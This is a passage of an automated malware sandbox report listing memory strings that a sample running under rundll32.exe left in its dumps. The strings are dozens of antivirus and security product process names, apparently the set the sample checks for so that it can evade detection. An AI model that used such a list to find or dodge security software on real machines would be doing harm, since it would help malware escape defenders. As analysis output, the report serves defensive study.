    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164057570.0000025BF00EC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935513236.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cafw.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163908029.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: nod32.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012083156.0000025BEE2EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562895894.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE267000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2488136352.0000025BEE26D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kav.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935634408.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: savservice.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VRMONSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ACAEGMgr.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DefWatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861921099.0000025BF00E2000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3315134591.0000025BF0173000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bdagent.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371707051.0000025BEE244000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pctsAuxs.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EMLPROXY.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935872656.0000025BEE236000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ITMRTSVC.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: K7TSMngr.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563049239.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521806811.0000025BEE2E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3011934316.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521533171.0000025BEE22C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935373365.0000025BEE235000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163887034.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UmxFwHlp.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561337202.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: GUARDXSERVICE.exe
    Source: rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ClamTray.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415074967.0000025BEE2D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ahnsdsv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861533714.0000025BF012D000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562924841.0000025BF0130000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: psimsvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2561299847.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862148801.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239614242.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862490782.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862052201.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714628317.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088610386.0000025BF012D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: PAVPRSRV.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASHSERV.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF00D3000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862430630.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239308691.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: msascui.exe
    Source: rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: F-STOPW.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3164215660.0000025BF00E7000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487985742.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2562830811.0000025BEE294000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414881638.0000025BEE292000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: guard.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371886647.0000025BEE239000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2371858536.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088903388.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ashMaiSv.exe
    Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163928030.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239485675.0000025BF009B000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2563029837.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2862282262.0000025BF00E0000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461958386.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387036812.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Qoeloader.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583DA8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335905975.000001F583DA7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335739896.000001F583DA3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787000498.0000025BF00E6000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2414761399.0000025BEE2C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415009108.0000025BEE2CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3387089360.0000025BF0173000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: UmxCfg.exe
    Source: rundll32.exe, 00000007.00000002.2372761198.000001F583D6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AVP.EXE
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2635512166.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2487965627.0000025BEE2E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3461465012.0000025BF0150000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2935242512.0000025BF0145000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: kwatch.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313655381.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3163768478.0000025BF016E000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2640578474.0000025BF00E1000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF016A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tpsrv.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.2372761198.000001F583DB0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000003.2335770527.000001F583DB4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714320236.0000025BF00D8000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3012000376.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786896704.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714589739.0000025BF00DC000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2415122030.0000025BEE269000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2786817677.0000025BF00D4000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3386930299.0000025BF0143000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3088755316.0000025BF0143000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pskmssvc.exe
    Source: rundll32.exe, 00000007.00000003.2335544837.000001F583DAD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3239400696.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3237961840.0000025BEE285000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3313815899.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2861700535.0000025BEE233000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787122688.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714502002.0000025BEE2B7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2714437251.0000025BEE2B1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.2787058914.0000025BEE2A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.3521748816.0000025BEE28C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000003.3089085224.0000025BEE2E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kvxp.kxp
